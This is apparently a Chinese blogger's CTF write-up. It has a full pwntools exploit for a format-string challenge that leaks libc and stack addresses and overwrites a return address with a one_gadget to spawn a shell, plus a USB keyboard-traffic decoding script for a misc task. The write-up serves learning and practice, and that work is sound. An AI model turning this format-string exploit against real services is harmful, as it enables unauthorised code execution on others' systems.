写在前头:只做出两道签到题,大佬们太多了,这次进不了夏令营了,???什么鬼,做出来题就能去,但跟其他事情冲突了,应该还是去不了了呜呜呜,总结起来就是知识面还是不够广,ezhttp死活做不出,还得继续努力学习,写做出来的两道简单题水一下(bushi),记录一下。

pwn:

fmt:

栈上格式化字符串,保护全开(最开始忘了,跑去修改got表,浪费一堆时间)

第一次格式化字符串泄露地址,第二次修改返回地址为main以便后面进行布栈和修改

gdb手动调试可以发现结束时满足其中一个one_gadget的条件,got表不可修改,那么可以修改返回地址:

2

可以发现如果修改main+33得修改6个字节,而如果我们修改__ libc_start_main+243只需要修改3个字节,所以选择后者,后面就是在栈上布置 __ libc__start_main+243的地址,但需要注意的是我们无法一次修改太多字节,所以要修改的三个字节得分别写入,脚本如下(当时写得有点乱):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./fmt')
libc=ELF('libc-2.31.so')
elf=ELF('./fmt')
#p=remote('60.204.140.184',30160)

payload1=b'%10$p-%19$p-%14$p'  # 泄露地址
p.sendlineafter('I need a str: ',payload1)
libc_base=int(p.recv(14),16)-2020800
success('libc_base:'+hex(libc_base))
p.recvuntil('-')
main_addr=int(p.recv(14),16)
main=main_addr-28+5
elf_base=main-0x13c6
success('main:'+hex(main))
p.recvuntil('-')
stack_addr=int(p.recv(14),16)+8
stack=stack_addr+0x10
success('stack_addr:'+hex(stack_addr))
one1=libc_base+0xe3afe
one2=libc_base+0xe3b01  # 符合条件的one_gadget
one3=libc_base+0xe3b04
success('one1:'+hex(one1))
success('one2:'+hex(one2))
success('one3:'+hex(one3))

# 修改返回地址以便再次格式化字符串
main1=main%0x100
success('main1:'+hex(main1))
payload2=b'%'+str(main1).encode()+b'c%10$hhn'
payload2=payload2.ljust(0x20,b'\x00')+p64(stack_addr)
#gdb.attach(p)
#pause()
p.sendlineafter('I need other str: ',payload2)

# 从小到大的三个字节(有时o2会比o3大)
o1=one2%0x100
o2=(one2>>16)%0x100
o3=(one2>>8)%0x100

# 进行布栈操作
stack1=stack+2
stack2=stack+1
# 格式化字符串修改__libc_start_main+243
payload3=b'%'+str(o1).encode()+b'c%11$hhn'+b'%'+str(o2-o1).encode()+b'c%12$hhn'+b'%'+str(o3-o2).encode()+b'c%13$hhn'
payload3=payload3.ljust(0x28,b'\x00')+p64(stack)+p64(stack1)+p64(stack2)
#gdb.attach(p)
#pause()
p.sendlineafter('str: ',payload3)
#gdb.attach(p)
#pause()
p.sendline(b'')

p.interactive()

3

misc

usb:

8字节,可以得知是键盘流量,HID DATA格式,先提取出来

1
tshark -r misc1.pcapng -T fields -e usbhid.data | sed '/^\s*$/d' > usbdata.txt

然后网上找一个全一点的脚本跑一下数据是什么:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
'''
BYTE1 --
       |--bit0:   Left Control是否按下,按下为1 
       |--bit1:   Left Shift  是否按下,按下为1 
       |--bit2:   Left Alt    是否按下,按下为1 
       |--bit3:   Left GUI    是否按下,按下为1 
       |--bit4:   Right Control是否按下,按下为1  
       |--bit5:   Right Shift 是否按下,按下为1 
       |--bit6:   Right Alt   是否按下,按下为1 
       |--bit7:   Right GUI   是否按下,按下为1 
BYTE2 -- 暂不清楚,有的地方说是保留位
BYTE3--BYTE8 -- 这六个为普通按键
from: https://blog.csdn.net/fjh1997/article/details/105841367
'''
import os
import tools
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True,
                    help="输入同级目录下的名称")
args  = parser.parse_args()

FILE_PATH = os.path.abspath(args.f)


normalKeys = {
        "04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
        "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
        "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
        "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
        "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
        "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
        "22":"5", "23":"6","24":"7","25":"8","26":"9",
        "27":"0", "28":"<RET>", "29":"<ESC>", "2a":"<DEL>", "2b":"<ALT>",
        "2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
        "32":"<NON>", "33":";","34":"'", "35":"<GA>", "36":",", "37":".",
        "38":"/", "39":"<CAP>", "3a":"<F1>", "3b":"<F2>", "3c":"<F3>", "3d":"<F4>",
        "3e":"<F5>", "3f":"<F6>", "40":"<F7>", "41":"<F8>", "42":"<F9>", "43":"<F10>",
        "44":"<F11>", "45":"<F12>", "4a":"<HOME>", "4c":"<DELETE>", "4d":"<END>", "4f":"<RightArrow>", 
        "50":"<LeftArrow>", "51":"<DownArrow>", "52": "<UpArrow>", "53":"<NumLock>", "54":"/", 
        "55":"*", "56":"-", "57":"+", "58":"<RET>", "59":"1", "5a":"2", "5b":"3", "5c":"4", "5d":"5", 
        "5e":"6", "5f":"7", "60":"8", "61":"9", "62":"0"}
shiftKeys = {
        "04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
        "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
        "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", 
        "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
        "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
        "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
        "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
        "28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"<ALT>","2c":"<SPACE>",
        "2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":":",
        "34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
        "3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
        "41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>", 
        "4a":"<HOME>", "4c":"<DELETE>", "4d":"<END>", "4f":"<RightArrow>", 
        "50":"<LeftArrow>", "51":"<DownArrow>", "52": "<UpArrow>", "53":"<NumLock>", "54":"/", 
        "55":"*", "56":"-", "57":"+", "58":"<RET>", "59":"1", "5a":"2", "5b":"3", "5c":"4", "5d":"5", 
        "5e":"6", "5f":"7", "60":"8", "61":"9", "62":"0"}

if FILE_PATH.endswith(".txt"):
    with open(FILE_PATH, "r") as f:
        data = f.read().splitlines()
else:
    data = tools.get_data(FILE_PATH)

def get_info(original=False):
    output = []
    for line in data:
        if line[4:6] == "00" :
            continue

        if not original and line[4:6] == "2a":
            output = output[:-1]
            continue

        if line[4:6] in normalKeys:
            output.append(shiftKeys[line[4:6]] if (int(line[:2], 16) >> 1 & 1 == 1) or (int(line[:2], 16) >> 6 & 1 == 1) else normalKeys[line[4:6]])
    return output

data = get_info(True)
print(f"原始数据: {''.join(data)}")

flag = []
for i in data:
    if i == "<SPACE>":
        flag.append(" ")
    elif i == "<ALT>":
        flag.append("\t")
    elif i == "<CAP>":
        flag.append("")
    elif i == "<RET>":
        flag.append("\n")
    elif i == "<DEL>":
        if flag != []:
            flag.pop(-1)
    else:
        flag.append(i)
print(f"正常数据: {''.join(flag)}")
os.system("pause")

得到:Ao(mgHy< DEL>Y$<CAP>a@q7< CAP>gW2D$dE@6#oO0f<Gm1hAI’/N#4C< DEL><AN;< CAP>ms@p< CAP>frQ149K< DELETE>

然后得根据那些键位自己改一下,根据删除键和大小写修改建进行修改(为什么知道要修改的一个原因是放进赛博厨子后出现个”flag{“,但后面就是乱码了)

改完后为:Ao(mgHY$\A@Q7gW2D$dE@6#oO0f<Gm1hAI’/N#4<AN;MS@PfrQ149K

放进赛博厨子里base85后即可得到flag:

4